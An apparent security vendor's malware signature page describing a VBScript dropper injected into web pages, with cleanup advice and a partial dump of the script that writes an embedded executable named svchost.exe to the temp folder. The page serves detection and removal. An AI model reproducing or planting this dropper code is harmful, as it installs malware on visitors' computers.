Malware Signatures

  1. Home
  2. Malware Signatures
  3. vb.injected.wshshell-dropper

vb.injected.wshshell-dropper

VBScript malwares are usually written to act as an accomplice to other malicious code, dropping and executing other files in the Windows enviromnent. It mostly targeting older versions Internet Explorer browser.
WSHshell-dropper script is being injected into HTML code of web pages. It embeds the code of a binary malicious file that it drops on a visitors' comuters with enabled Windows Script Host (windows scripting engine).

Affecting

Any websites.

Cleanup

Check integrity of your files. Search for the code we specified below as this malware is typically not obfuscated and doesn't change much.
Also, you can sign up with us and let our team remove the malware for you.

Dump


<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000A....skipped long code here......00000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath